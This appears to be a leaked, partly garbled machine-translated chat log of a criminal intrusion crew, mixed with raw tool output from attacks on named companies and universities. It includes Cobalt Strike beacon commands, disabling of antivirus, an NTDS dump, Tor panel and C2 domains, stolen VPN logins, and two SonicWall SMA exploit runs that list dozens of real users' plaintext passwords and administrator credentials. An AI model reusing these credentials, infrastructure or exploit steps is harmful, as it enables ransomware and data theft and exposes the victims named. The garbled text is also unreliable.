on the second network help guys just asked a question and silencea where did you get them?) or your own? and you give us them?) rules remember? drop a couple of dllnet here do not drop, right? `VMware vCenter 6.0 Server DCWAS79````
>description: Symantec End Point Management Server
>dNSHostName: DCWAS45.Wilsonart.com

>description: PROD Symantec AntiVirus Management Server
>dNSHostName: FLWAS03.Wilsonart.com
>description: PROD Symantec AntiVirus Management Server
 Directory of C:\Windows\Temp\ntds

12/23/2020 06:00 PM <DIR> .
12/23/2020 06:00 PM <DIR> .
12/23/2020 06:00 PM <DIR> Active Directory
12/23/2020 06:00 PM <DIR> registry
               0 File(s) 0 bytes
               4 Dir(s) 55,007,834,112 bytes free

The current time is: 13:19:19.88 It's the middle of the day, right? Yeah, let's hope that everything was successful all offeshas still check the area, if available ready) yes it's not clearav included?Z1NPS1 - linux, Z1SDEPLOY - no file is not cheknu other hell is there, but the token worked as razvfail? Z1AD3: 192.168.1.41 - this dkeesh not looked, now domain authorization?
Z1AGILITYAPP: 10.10.0.17
Z1SDEPLOY: 10.10.0.57
Z1INFOLINK: 192.168.1.224
Z1AD3: 192.168.1.41
Z1CA1: 10.10.0.5
Z1NPS1: 10.10.0.56
```
This is what's online now, I'll take a closer look at the tops and check if all servers are ok/not ok other servers check domain3, what kind of delays they have left?
57 servers pinged, 67 in total.
41 pulled in, 9 lines, 7 mapped disks.
140 armies pinged - 278 in total
managed to ping 40-45ox now
or did the end of the day coincide and all the armies went offline) if the servers reboot and the build does not finish the work all will fuck up a little bit armies all put the new mapped servers we probably disabled win-def and av
we got burned, changed some people's passwords
we started to unhook the armasmas mapped two of them?) it was their own doing) check it out then start 10-15 pcs and started right away? at the last stage of the armas mapped you did not start? we all pulled the server to start laying it out so
We've been burned. We're pulling servers, we're mapping armas. How's your progress?
[+] received output:
192.168.20.129:445 (platform: 500 version: 10.0 name: CF-RPA05 domain: CEDARFINANCIAL)

[+] received output:
192.168.20.110:445 (platform: 500 version: 6.3 name: CF-HQ-RADIUS domain: CEDARFINANCIAL)

[+] received output:
192.168.20.109:445 (platform: 500 version: 10.0 name: CF-HQ-DV domain: CEDARFINANCIAL)
192.168.20.113:445 (platform: 500 version: 10.0 name: CF-RPA03 domain: CEDARFINANCIAL)

[+] received output:
192.168.20.125:445 (platform: 500 version: 10.0 name: CF-RPA02 domain: CEDARFINANCIAL)
Scanner module is complete

[*] Checking for MS17-010 vulnerability on ip:192.168.20.129
[+] host called home, sent: 3021 bytes
[+] received output:
Connecting...
[+] received output:
Connection Error: connection to port 445 is denied
``and this is my admin BLEEP! he has a directive to keep our projects as a priority Nee still very much missedPanel I understand that the current admin went head to head with the teamlid on their projects Where?)it seems that we need to look for a new admina with Tore as I think it's better done with clearing can find on the dns what anomalies bots reserchers or who knows what the fuck tied to direct access through the domain onlythere is a simple logic from my side and do not see advantages in torebo do not like lagisubjective truth I prefer clearing all different say can you consult with your on this issue?I don't know if it makes any difference to us) I'm kind of thinking the same thing, maybe in our case, tor = clear for the feds if you move to clear you need to remove all external data in case of removal of the so vyrobno so nauseating)me in fact torav tor3 different sections with a full page load to make adjustments + availableadmins give the rights to the case there yuzabili not very))) I looked in the ehe all fuckin naponavlena everything where my domains all appeared not[ ](https://mediaeveryone.com/direct/Rmne8eAkiu37dhmzyJcaRFnKQqepiffHq?msg=584ipFCpgaphYXcc) only the admin? i see... see... read... cry.... not different
but i can only see admin in yours all fuck it, my ass is on fire can i add them to mine if they are not different do i have to prescribe them for all my users? which lusthope/periodprescribe you have a parameter only for admin listen nothing flies (put them as soon as you read them also put them in the brute force section through edithttps://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/uessparameter domain and select their polzakov, do not forget to limit the period and lusthonvyvy choose here edit opposite the anchor (dll,ehe) - confighttps://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/тооІѕрегаешь their domains herehttp://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion/distinopagesa please tell me how to set my users in the toolpanel so they can generate anchor?
try somewhere else to put the blocker in the wayFolder: \Microsoft\Windows\BitLocker
TaskName Next Run Time Status
======================================== ====================== ===============
BitLocker Encrypt All Drives N/A Ready
BitLocker MDM policy Refresh N/A Ready I'm doing a search for HQ # and can't find it.rundll32 C:\Users\Dorinda.alredge\appdata\roaming\Adobe\cache.dll,Control_RunDLLdll is not in place of the stack not run like that? beacon> shell rundll32 C:\Users\Dorinda.alredge\appdata\roaming\Adobe\cache.dll entruPointda where? we have in the common rocket? which ankbekdorpishi in the canal directodomen changed to their vindef not palitaga ok who is responsible for admins? on mine no httpsspass thanks)you're welcome)i can drop dead bots from my zakrpahs which are 93 pcs?aha okekpost update on tulspaneli poured immediately on the check them to their own then https://dyncheck.com/scan/id/1e37fc86492658d48561c7e4f69eb3cdmme the domains have given one check updates) ahaaerezalizayut in tulpanel? tookhttp://dyncheck.com/scan/id/7bd312303566339897552de90bf1c560within tulpanelikor who?vindef palitz all fucked up //dyncheck.com/scan/id/c986a3c2ff98cc338cc1d58c9db9c000cncnc for today then these 2? but he longs to take his from bentley will take his)i think not)levf. ytn0 just if i kill you will work differently took these 2
Tell me if I don't kill your domains? I'll take these 2 then on my admin panel I have it written down that these domains are mine.
muncuc.com
farfaris.com
homilistana.com
omelezatava.com
fikjtyun.com
jetbiokleas.com
nyhgloksa.com
onvegokaue.com
``I understand the second link on the second ank''
 muncuc.com,farfaris.com
omelezatava.com,fikjtyun.com
``How the fuck should I know?'',omelezatava.com,fikjtyun.com Which ones for the office? These are yours for the main one```
DOMAINS
muncuc.com
farfaris.com
i used to attach these domains to your domains remember? you alive? i think i'll attach them on the fly? i'll debug this shit, i've been working on it for 24 hours, i had problems with launching the dlltams, i figured out that only 3 servers are catching form on the first day on all 3!
[+] Location: C:\windows\temp\MRT\*

 Size Type Last Modified Name
 ---- ---- ------------------- ----
 205.6KB fil 12/27/2020 17:43:59 vminst.dll
            fil 01/19/2021 06:30:24 vminst.log
``````
 Directory of \ovrscweb1\c$\windows\temp\MRT

01/19/2021 03:51 PM 0 vminst.log

``o_o``.
 Directory of \ovrscweb2\c$\windows\temp\MRT

01/19/2021 03:47 PM 0 vminst.log
               1 File(s) 0 bytes
               0 Dir(s) 68,013,015,040 bytes free

What's up there? What the fuck's up in Overlander? They're just buying access from all sides?
fuck it
go to
# palyoad the fuck up #
and work as a cobo.
https://mydesktop.kingston.ac.uk/portal/webclient/index.html
USER: k1945880@kingston.ac.uk
PASS: Thanzeeh77
```

And also YUK university also think it is worthwhile now to go on the rdpveb? purely to get a license and to get fixed "in the desk" this university it is unlikely that there should be difficult, but pick someone try to go up```.
https://vpn.umontreal.ca/dana-na/auth/url_default/welcome.cgi
USER: p1204216
PASS: Des99714
so it depends on the outcome of the decision.
do you want to take the job? I'll mark which are the priority to open what will open) revenus don't give a fuck anyway ok + esfox_com_ad_users.txt I honestly have a hard time collecting you can sign revenus if you have in this format will pass) esfox_com_ad_users.txt tell me how to do) esfox_com_636kk.txt
will it be ok in this form? ok I'll do it Yesterday I spent most of the day collecting files from the confiessional since we'll be moving the files I'll just parse them already) Well, to reopen where? also pass the work to globalmarkstatik
I'll do it now.
i'll give it a priority, just sign the domain in the file name, they need only ad_user? i'll dig through my archives at the same time
i have something with ntDSs, i think i'll give you to reopen it tomorrow? i thought maybe i could reopen it today, but it didn't work according to bicon logs?the idea failedda and i don't have the listing, i don't have the log files from the tachkanet they don't give a fuck about the trick, we had a file listing, we just uploaded the assembled file to the mega with the size of the listing but with the locale format to merge the database i can't get back there there people are ready to pay the date i did not download from an important case serious i had a fatal accident((there is a fuckload of stuff to do) why aren't you asleep?i'm not going anywhere. 3 hours, that's no time at all. when you're done with your chores, we'll probably run through some more. yeah.
patch on a particular holea, I still have to prepare files to reopenadvizori? yes not patched so straight away was not advizori ... already released a patch that lisoniki chet sploit glitchy it fixes soniki wait? that's it like that ... I'll do the brut from globaltranzav five kovyty her) grid on lardbilimora you have anything to work with today?i can't remember anything else))) mmmmm deadline for tomorrow it's already been ordered by the augabrooks and kermit guys there's cobalt testing to be deployed ehhh i got lost can you remind me of my tasks now it'll be weird we wrote yesterday so i'm taking tomorrow deadline listen to this
there's gonna be a download soon, right? fuckin' great
i'm just sleepy. how's it going?) hi there, tomorrow by 12:00+retif.com, plzbukkammer no one's got any webmorda2auth+pozhaylustamen add to it so far only adinfu has time to throw out of there fast. that's where yes`grantweber.com
I checked everyone in the first one, no one has any bookmarks.
in the second without 2fa, go through the client, almost immediately throws out, butch more men seem to move?
[+] Checking URL https://172.81.67.174
[+] Found old SMA version (<9.x)
[+] Appliance running version 9.0.0.2-13sv

[+] Leaking sessions to dump configuration.
[+] Attempting to dump sessions from https://172.81.67.174
      [+] Found: SessionID: 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ= userType: 1 userName: dscully Password: Scully2@ Domain: retif
      [+] Found: SessionID: 3mzEGy480eoTW0PVGB4WkTx1pBcNckgNRvimSDRWboM= userType: 1 userName: acatalanotto Password: vera1010 Domain: retif
      [+] Found: SessionID: 6nkViGzUAfwhcy9EQTC4B1cnAJKVmuLVBoJQnaDHKKI= userType: 1 userName: rblanchard Password: abcd@1234 Domain: retif
      [+] Found: SessionID: 7180aU0jSdpraYLUADh6OpRYJJZekIHXoo2xT8XjI1tM= userType: 1 userName: anguyen Password: Car47029 Domain: retif
      [+] Found: SessionID: ClOqhz81D1QDthdUyzSnIFF3f9qpwBDnv6lJAueAMI= userType: 1 userName: dstoutin Password: C@ryH@milton Domain: retif
      [+] Found: SessionID: IMGyFJ3dmPSncBddBfqJzy5C9W0heL1wY02V35a3Ei8= userType: 1 userName: dblanchard Password: Tujaques2 Domain: retif
      [+] Found: SessionID: NrRgAAQeaCc1nMajX8HGk4ySOyKy89nDEs5Dbfm7JAtA= userType: 1 userName: mcooper Password: !Crystal2 Domain: retif
      [+] Found: SessionID: W1ed6V04FqvC8gm29587VfRoeqi7xvSIltpz1O6txrw= userType: 1 userName: lotrocki Password: Lisa0759 Domain: retif
      [+] Found: SessionID: WMhTxZjMPY1fIXps0WPYYA2kgbnnKD1fQxQm5tbuEoI= userType: 1 userName: jdufrene Password: Memphis3 Domain: retif
      [+] Found: SessionID: ZuQ9mTRTfwnBvo01zvkWjbiEpg08U9ZZtdH7rXiISAg= userType: 1 userName: hnguyen Password: Jan_2021 Domain: retif
      [+] Found: SessionID: dN616QT3BLlfjo6XWoSaQVHJnAngQo6LiTVFH30xc4w= userType: 1 userName: Pschmidt Password: AKLfefe1988!!! Domain: retif
      [+] Found: SessionID: e6cwRd0MGWQZVZHmX09ldTrZdr4VC23Cm4qU1V41dZ0w= userType: 1 userName: lgagnet Password: Minto123* Domain: retif
      [+] Found: SessionID: eI0R46CQYycD1NLEwpoEdF9nHtx7vpteNugSjYFj9tg= userType: 1 userName: awashington Password: 0ilTruck! Domain: retif
      [+] Found: SessionID: jgdazqQh0tgr1o8MG6ikF2184YZzRokNrHb1PTyin5c= userType: 1 userName: msepter Password: abcd@1234$ Domain: retif
      [+] Found: SessionID: jwAGVr88UefTCwRfR9L4c8yeyRQAEFQlVtois0VO7X0= userType: 1 userName: lfisher Password: Alexander14 Domain: retif
      [+] Found: SessionID: jyQ0Ho1OBKlJSAVMstBiz1MvRXBKywGB0XYEiwMfcg= userType: 1 userName: jrusso Password: 504Jamie#@! Domain: retif
      [+] Found: SessionID: oNbdkn6iFhSvXfc3yvNApWNCg71kcTk1Lky2pn04jY= userType: 1 userName: kjones Password: Dothan24! Domain: retif
      [+] Found: SessionID: s27ilDCfc00iQPuHM0LueLSKoC8i4a4eT4A1D5LbNPQ= userType: 1 userName: lcoriell Password: Jutland@1840 Domain: retif
      [+] Found: SessionID: uapufXbKjgRslg2pFYEmT8b5PkKO9s4N5stplyxkEfQ= userType: 1 userName: tragas Password: Troll112// Domain: retif
      [+] Found: SessionID: x7QnRi1w6uhqEK3E3z7XUPKtgDcbYWWaFCPNbG0idLI= userType: 1 userName: ehicks Password: H@ppyD@y1 Domain: retif
      [+] Found: SessionID: xtxwXEVx0Rp5h8Lc40tMB5kMB5kBQTvFpLfdXxYP3UPOH6o= userType: 1 userName: barcement Password: Ba041913* Domain: retif
      [+] Found: SessionID: y43yuwBMnVBmeEEjwC6k8yRxce0p619bb2U6IU8rg8= userType: 1 userName: dwinter Password: Blair127! Domain: retif
      [+] Found: SessionID: zxKhq2SRlYmt17y2UOP1BXEwyh00UCkDAgUKb2HL2PU= userType: 1 userName: ehassell Password: Amelia#0130 Domain: retif
[+] Done with https://172.81.67.174, found 23 sessions
23
[+] Saving session data
[+] Trying session 0nwEo7juJp9uceT0bhNC2hMM7VuvDFIjyC5LyKjx6fQ=
[+] Saving config to ./Dumps/172.81.67.174/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 78 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds Administrator:Manresa02#@10.1.10.210

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 4, 'name': 'Retif Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfterm.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 4, 'name': 'PDI Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfpditermprd.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 6, 'name': 'MAS90 Terminal for ehicks', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jut-ehmaas.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 41, 'name': 'Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'JUT-JHARTLEY2.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 39, 'name': 'L Fisher Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'JUT-LFISHER.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 67, 'name': 'Office Desktop', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.1.10.72'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 71, 'name': 'PDI Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfpditermprd.retifnet.retif.com'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 71, 'name': 'Retif Terminal Server', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'rtfterm.retifnet.retif.com'}
``and there's also one more crack in the works right now''.
[+] Checking URL https://173.247.171.106
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.1-18sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 08wKU0nD0NHM018GdPixkSp0veaEEfUNs1sfY3emGN8= userType: 1 userName: connie.arteaga Password: Clevs8787 Domain: Beyond
      [+] Found: SessionID: 1EYTlhUHb3WlJkyj6scGx0d1E45q4HdXA1KqyU8IXYs= userType: 1 userName: jim.movius Password: Grant3333 Domain: Beyond
      [+] Found: SessionID: 1Yw1sPSEQbDO1nbNbjTBcBcHdiJImQaNz1I1lwAmnxOSSE= userType: 1 userName: Steven.Craig Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: 1nOvfdxEtWVea0UkJvtNyIwBLP0O79CE8E1GZZdONc= userType: 1 userName: steve.price Password: Incorrect100 Domain: Beyond
      [+] Found: SessionID: 3HZDekmljv4atHltwUxKNQY1S0v1jlgw1TtNSAZG7pw= userType: 1 userName: Leslie.Avalos Password: Grantweber2018 Domain: Beyond
      [+] Found: SessionID: 98xPB0MpOWeItn9GWgS93plCOLbFch0X9xFcN8shiag= userType: 1 userName: kailani.gaspar Password: v1nce2307 Domain: Beyond
      [+] Found: SessionID: Cf3UjAwYoQgvqTHWxkBX3gdrOM6syrTuecLKh05qUoc= userType: 1 userName: robert.nye Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: EYZKipX33P9zsCZ6se1WIx01zUkyMFdBRQcmLlADkhw= userType: 1 userName: pilar.zuniga Password: basiaZ1929 Domain: Beyond
      [+] Found: SessionID: HDREC6P5KFHGoW1vGbZLyTQxGc5aUNHzuaMgVHE2KOk= userType: 1 userName: Rodolfo.Maldonado Password: Grant2021* Domain: Beyond
      [+] Found: SessionID: Ikd51149NxTHZFsSlmFzmcgqGvEAR4jfGWqL9nEJQhg= userType: 1 userName: joanna.gallegos Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: J1cTnjaQPil0T86G0S6JkLE0a3AA41xSB3oJ2C1nDPg= userType: 1 userName: tony.aguayo Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: KMDs2M9R8fDa79OTo8S348NFJvJvBp0QiRPbTsMK14Gmc= userType: 1 userName: Denise.Williams Password: Grant2016 Domain: Impact
      [+] Found: SessionID: LdFQ9ghPD0O5mIJt7WkT7v2K1SJwhcf2GhiALf7WUxI= userType: 1 userName: Luis.Fernandez Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: MB61rZaVHu4Fd01rTiNb4ebPSv37ciFbWGyjHPojus= userType: 1 userName: Jung.Lee Password: Lebron2021 Domain: Beyond
      [+] Found: SessionID: PGMscMXIm0PGyWz1SLfpcZFFViP2Qhkh9oLDjmYbGANM= userType: 1 userName: Jeff.Moeller Password: Bruce1967 Domain: Beyond
      [+] Found: SessionID: THdBDUwEn4S79iRjybPvDFo6t2YsFJ0sSrba7PoKa8= userType: 1 userName: bereniz.boss Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: VINYGOn933HMn1EVeh3Hqfo7DkyEswr3DZuEPnR2vr4= userType: 1 userName: joseph.monette Password: Vegas2020 Domain: Beyond
      [+] Found: SessionID: WUolvIMVxr5vU0R8400eH1nofJp4Eo5ztra4eil2pJ4= userType: 1 userName: josey.barrera Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: WZh28egsBep41ACBjFqqF1eRbVpPENVxx5LFZMfuoxs= userType: 1 userName: Steven.Mehr Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: XLg1SWXPoCO0tiowUdnblgUrdLUlco2PDzbbx81R8wg= userType: 1 userName: Sandra.Silva Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: XvG4d2mFJOWr11oUfdwZAS3TvjEilgl8kcHuAxbIRH8= userType: 1 userName: jason.allison Password: Grant2024 Domain: Beyond
      [+] Found: SessionID: ZNhJROmzHsCRwB81lAKDIyqcc97GM9nJVabiOVCadyM= userType: 1 userName: oscar.soto Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: a3ltPWpiKONzJ27EASYq5PpDjOPWB06ckP24q1oactM= userType: 1 userName: Eric.Mcinnis Password: Lolo702277 Domain: Beyond
      [+] Found: SessionID: d1CmeOs8Fg603rog8E8DDDEAgvd5dBnPhXDnsovWEbx8= userType: 1 userName: Nellie.Rosales Password: Nini2018# Domain: Beyond
      [+] Found: SessionID: dVTFvujUeSSwuweBIhzU2okUgnwcmrH51uoHojrkdbM= userType: 1 userName: jamie.ferreira Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: gCHZ4UatX97lMcsjhlYV6VcezzodohrVjB1HC7yQjKHo= userType: 1 userName: Sharon.Poole Password: Sharonp20201 Domain: Beyond
      [+] Found: SessionID: gGzMmC1Ze9b9RPZeA9itq4Mlf5BV6KfSmiRqdYa1g7A= userType: 1 userName: loraine.molina Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: gYy6AOPIOh0fSSbUXFDPcUuGqH95c00BNHn7WbRetSw= userType: 1 userName: melik.poghosyan Password: Grant1111 Domain: Beyond
      [+] Found: SessionID: jFgGjaqh1FvP0yy8iBKQiHiKLFPGCiEstDEN1pmoXY= userType: 1 userName: Janiece.Knott Password: Janiece1 Domain: Beyond
      [+] Found: SessionID: keWbTufTW0TAXNHwik99d1u9FbztTnyifCg1H5Zad34= userType: 1 userName: kyle.shorten Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: lEDnuPFpU0MJOE4kwqAfHuDWgKjGzSxCfikysyh1XM= userType: 1 userName: Frances.Guerrero Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: n1Ryw5Npa34yil3ClDr4rxwVVVE23YAIfnMq0ieYqLCIM= userType: 1 userName: jake.ortiz Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: nSSw2myFOc4UOOsB4ethYNEuQszC277jky8qdwbKOi0= userType: 1 userName: april.vance Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: nn9KyDegeC6Vso1CzrXrJVKESDgFERzGr1HUuhmiVNdY= userType: 1 userName: lluvia.aguayo Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: rhyybLubLCmo3rYUE319r5Hcx91oUzmDYSYhFMi9VU= userType: 1 userName: Zaineb.Hasan Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: rjtrDOMZRkaVU81LkI1SSYaQNzoop1ChrSfSvCe2Gg= userType: 1 userName: eric.holmes Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: sxM0QSrebzOJBsFq0m21ayCFmTE2oCSQ3rYFfGAghTE= userType: 1 userName: Chris.Brown Password: Grant2020 Domain: Sales
      [+] Found: SessionID: v19KVv1mCxhZFhq3eWrMMITArOMs2nrr34qYoWTYujU= userType: 1 userName: sabrina.buksh Password: 10066Buksh Domain: Beyond
      [+] Found: SessionID: verRB4sw28XB4A0eEI0ewLablalELYO83gfIDY96zyI= userType: 1 userName: dorothy.roscher Password: Dorothy1966$ Domain: Sales
      [+] Found: SessionID: wBlAIohH03mCi8XxyQLDs1YYa1BsTXm1k9FsrohXmaU= userType: 1 userName: luis.garcia Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: wU9MQsVIHBXhkNUHgYbVJUHiqmCrnsAsuihXW6LIUT8= userType: 1 userName: vincent.velardi Password: Grant2020 Domain: Beyond
      [+] Found: SessionID: xR18vaBQUR6z2q4kOLGWehrPFbV3I5b1dVFsbAJwCDE= userType: 1 userName: Pedro.Campos Password: Grant1980! Domain: Beyond
[+] Done with https://173.247.171.106, found 42 sessions
42
[+] Saving session data
[+] Trying session 08wKU0nD0NHM018GdPixkSp0veaEEfUNs1sfY3emGN8=
[+] Saving config to ./Dumps/173.247.171.106/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 88 users


[+] Finding AD credentials
[!!!] Found Active Directory creds
[+] AD creds :@10.10.10.5
[+] AD creds :@10.10.10.5
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds :@10.10.10.7
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds :@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.9
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18
[+] AD creds administrator:2016GW@Calabasas@10.10.10.18

[+] Looking for LDAP domain credentials
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 19, 'name': 'Transfer Files', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\gwcafile1\\transfer\\%USERNAME%\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 17, 'name': 'Launch Impact !!!', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Contracts Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\\contracts\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 28, 'name': 'Click to Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Managers Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\managers\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': ''T' Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\FD3\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'Trust Share "Q" Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\Trust\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 26, 'name': 'QuickBooks Share "X Drive"', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\\QuickBooks\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': '"W" Drive', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\WorkCompShareData\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 38, 'name': 'Secure File Transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.3\\SecureShare\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 42, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 42, 'name': 'File Transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\Tehachapi\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 52, 'name': 'Secure File transfer', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.5'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'SFTP Share', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Akcelerant', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'akcel-web/Akcelerant/Core/Desktop/Desktop.mvc/Index'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 63, 'name': 'FIle Transfer Link', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.12\transfer\\Olympia\\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 63, 'name': 'Launch Impact', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.215'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 64, 'name': 'Launch Akcelerant', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'akcel-web/akcelerant'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 77, 'name': 'Impact Remote Access', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.153'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Web Server', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.20.20'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Database Server', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.20.21'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Akcelerant Test Server', 'username': 'administrator', 'password': 'Gr@nt2011it01', 'service': 'RDP', 'host': '10.10.10.23'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'File Share on Akcel-Web', 'username': 'sqladmin', 'password': 'Gr@nt2011it01', 'service': 'CIFS_SMB', 'host': '\\\\10.10.20.20\\Files\\'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'File Share on Akcelerant Test Server', 'username': 'administrator', 'password': 'Gr@nt2011it01', 'service': 'CIFS_SMB', 'host': '\\\\10.20.0.95\\New\\'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
